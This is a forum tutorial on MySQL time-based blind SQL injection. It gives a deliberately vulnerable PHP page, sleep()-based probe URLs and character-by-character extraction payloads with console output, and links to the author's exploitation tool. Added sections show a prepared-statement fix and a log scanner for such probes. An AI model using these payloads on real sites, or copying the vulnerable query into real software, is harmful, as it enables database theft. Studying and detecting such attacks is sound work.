This post was last edited by blackfish on 2016-1-8 20:51
Time-based injection is used when the page neither prints data nor shows database errors: in that situation data cannot be obtained with a UNION query, and it cannot be obtained through a MySQL error message either, so the only remaining channel is the response time.
The PHP file used for local testing:
<?php
// Deliberately vulnerable test target: the user-supplied value is concatenated
// straight into the SQL text, and nothing is printed or reported on error,
// so only a time delay can reveal anything about the query result.
$conn = mysql_connect("localhost","root","") or die("database connection failed");
mysql_set_charset('GBK',$conn);
mysql_select_db("dede2",$conn);
$user = $_GET['user'];
$sql = "select uname,pwd from dede_admin where uname = '{$user}'";
$result = mysql_query($sql,$conn);
$results = mysql_fetch_assoc($result);   // fetched but never output
mysql_close($conn);
?>
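For comparison, here is the same lookup written so that the injection described in this post cannot happen. This is an added example, not code from the original post: it uses mysqli with a prepared statement (the mysql_* functions used above were removed in PHP 7), assumes the same local database (dede2, table dede_admin with columns uname and pwd), and keeps the original behaviour of printing nothing.

```php
<?php
// Added example (not from the original post): the same query with a prepared
// statement. The SQL text is fixed at prepare time and the value travels
// separately as a bound parameter, so a value such as  admin' AND sleep(5) --
// is compared literally against uname instead of being executed.
function lookup_admin(mysqli $conn, string $user): ?array {
    $stmt = $conn->prepare("SELECT uname, pwd FROM dede_admin WHERE uname = ?");
    $stmt->bind_param("s", $user);      // "s": bind as a string, never interpolated
    $stmt->execute();
    $stmt->bind_result($uname, $pwd);
    $row = $stmt->fetch() ? ['uname' => $uname, 'pwd' => $pwd] : null;
    $stmt->close();
    return $row;
}

$conn = new mysqli("localhost", "root", "", "dede2");
// Set the connection charset through the driver (as the original does with
// mysql_set_charset) rather than with a raw SET NAMES, so the escaping rules
// and the connection charset cannot disagree.
$conn->set_charset("GBK");
$user = $_GET['user'] ?? '';
$row = lookup_admin($conn, $user);   // still not output, same as the test page
$conn->close();
```

With this version the request from the next section still returns a 200 with an empty page, but the response time no longer depends on the value of user, so the timing oracle the rest of the post builds on is gone.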
How to tell whether time-based injection is possible
http://localhost/sleep.php?user=admin'+AND+sleep(5)+--+
The statement the database actually executes is:
Select uname,pwd from admin where uname='admin' and sleep(5);
If the condition holds (uname = 'admin'), the response is delayed by 5 seconds; otherwise there is no delay.
Select length((select @@version)) #query the length of the version string
Select uname,pwd from admin where uname='admin' and sleep(if(length((select @@version))=10,0,5))
If uname='admin' and length((select @@version))=10 both hold, there is no delay.
If uname='admin' does not hold, there is no delay regardless of whether length((select @@version))=10 holds.
Only when uname='admin' holds and length((select @@version))=10 does not hold is there a delay.
Once you know a delay can be triggered, how to extract data
mysql> select mid((select @@version),1,2); #take 2 characters starting at position 1
+-----------------------------+
| mid((select @@version),1,2) |
+-----------------------------+
| 5. |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select mid((select @@version),1,10); #take 10 characters starting at position 1
+------------------------------+
| mid((select @@version),1,10) |
+------------------------------+
| 5.5.20-log |
+------------------------------+
1 row in set (0.00 sec)
Select uname,pwd from dede_admin where uname='admin' and sleep(if(mid((select @@version),1,1)=10,0,5));
If the first character of the result of select @@version is 10, there is no delay; otherwise the response is delayed 5 seconds. In this way the value of select @@version can be extracted one character at a time.
When Select uname,pwd from dede_admin where uname='admin' and sleep(if(mid((select @@version),1,1)=5,0,5)); produces no delay, the first character of select @@version is 5. The next question is how to extract the decimal point. MySQL has the ORD function, which converts a character to its ASCII code.
Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid((select @@version),2,1))=46,0,5)); produces no delay, so the ASCII code of the second character of select @@version is 46, which is the decimal point.
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),2,1))=54,0,5));
Empty set (5.02 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),2,1))=46,0,5));
Empty set (0.00 sec)
mysql> select @@version;
+------------+
| @@version |
+------------+
| 5.5.20-log |
+------------+
1 row in set (0.00 sec)
This way both letters and special symbols can be extracted. To determine the extracted value quickly, use a binary search with the greater-than or less-than operator in place of the equality test:
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<50,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<52,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<53,0,5));
Empty set (5.00 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))<54,0,5));
Empty set (0.00 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))=54,0,5));
Empty set (5.01 sec)
mysql> Select uname,pwd from dede_admin where uname='admin' and sleep(if(ORD(mid
((select @@version),3,1))=53,0,5));
Empty set (0.00 sec)
This quickly establishes that the ASCII code of the third character of select @@version is 53, i.e. 5.
Once you understand how time-based injection works, a few days of Python is enough to write an exploitation tool; this is a small tool I wrote:
http://www.f0rg3t.com/Show/index/cid/1/id/9.html
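From the defender's side, the technique above leaves a distinctive trace: a run of requests from one client whose query strings contain sleep() or benchmark() wrapped in an if() comparison, with the response time alternating between roughly zero and the chosen delay as the comparison succeeds or fails. The following is an added example, not part of the original post: a small PHP scanner that reads access-log lines and flags that request shape. The log lines are constructed samples modelled on the URL used earlier in the post; the layout (Apache combined format followed by the response time in whole seconds, as the %T directive would write it) is an assumption about the log, not something the post describes.

```php
<?php
// Added example (not from the original post): flag requests that carry a MySQL
// time-delay construct in the query string, and note whether the server
// actually stalled, which is what a successful conditional sleep() looks like.

// Constructed sample log: combined format plus response time in seconds.
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [08/Jan/2016:20:40:01 +0800] "GET /sleep.php?user=admin HTTP/1.1" 200 0 0
10.0.0.9 - - [08/Jan/2016:20:40:02 +0800] "GET /sleep.php?user=admin'+AND+sleep(5)+--+ HTTP/1.1" 200 0 5
10.0.0.9 - - [08/Jan/2016:20:40:08 +0800] "GET /sleep.php?user=admin'+and+sleep(if(ORD(mid((select+@@version),3,1))<50,0,5))+--+ HTTP/1.1" 200 0 5
10.0.0.9 - - [08/Jan/2016:20:40:14 +0800] "GET /sleep.php?user=admin'+and+sleep(if(ORD(mid((select+@@version),3,1))<54,0,5))+--+ HTTP/1.1" 200 0 0
10.0.0.9 - - [08/Jan/2016:20:40:15 +0800] "GET /sleep.php?user=admin'+and+sleep(if(ORD(mid((select+@@version),3,1))=53,0,5))+--+ HTTP/1.1" 200 0 0
10.0.0.7 - - [08/Jan/2016:20:41:00 +0800] "GET /index.php?q=sleep%20well HTTP/1.1" 200 512 0
LOG;

/** Parse one access-log line into its fields; returns null if the line does not match. */
function parse_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) (\d+(?:\.\d+)?)$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'path' => $m[4], 'status' => (int)$m[5], 'secs' => (float)$m[7]];
}

/** True if the decoded query string calls a MySQL delay function such as sleep() or benchmark(). */
function has_delay_payload(string $path): bool {
    $query = (string) parse_url($path, PHP_URL_QUERY);
    // In a query string '+' is a space, which is how the post's URL encodes  ' AND sleep(5) --
    $decoded = strtolower(urldecode($query));
    // Require the opening parenthesis so ordinary words like "sleep well" are not flagged.
    return (bool) preg_match('/\b(sleep|benchmark)\s*\(/', $decoded);
}

/**
 * Scan log text and return one finding per request that carries a delay payload.
 * 'slow' is true when the response took at least $delay_threshold seconds,
 * i.e. the conditional sleep() fired and the probe's condition was false.
 */
function find_time_based_probes(string $log, float $delay_threshold = 4.0): array {
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parse_line($line);
        if ($r === null || !has_delay_payload($r['path'])) {
            continue;
        }
        $findings[] = [
            'ip'   => $r['ip'],
            'time' => $r['time'],
            'slow' => $r['secs'] >= $delay_threshold,
            'path' => $r['path'],
        ];
    }
    return $findings;
}

// On the sample above this reports the four /sleep.php probes from 10.0.0.9
// (two DELAYED, two fast) and ignores both benign requests.
foreach (find_time_based_probes(SAMPLE_LOG) as $f) {
    printf("%s %s %s %s\n", $f['time'], $f['ip'], $f['slow'] ? 'DELAYED' : 'fast', $f['path']);
}
```

The alternating DELAYED/fast pattern from a single client against one URL, with the comparison constant changing between requests, is the signature of the binary search shown above; the payload match alone is enough to block or alert on, and the timing column confirms that the injected sleep() actually reached the database.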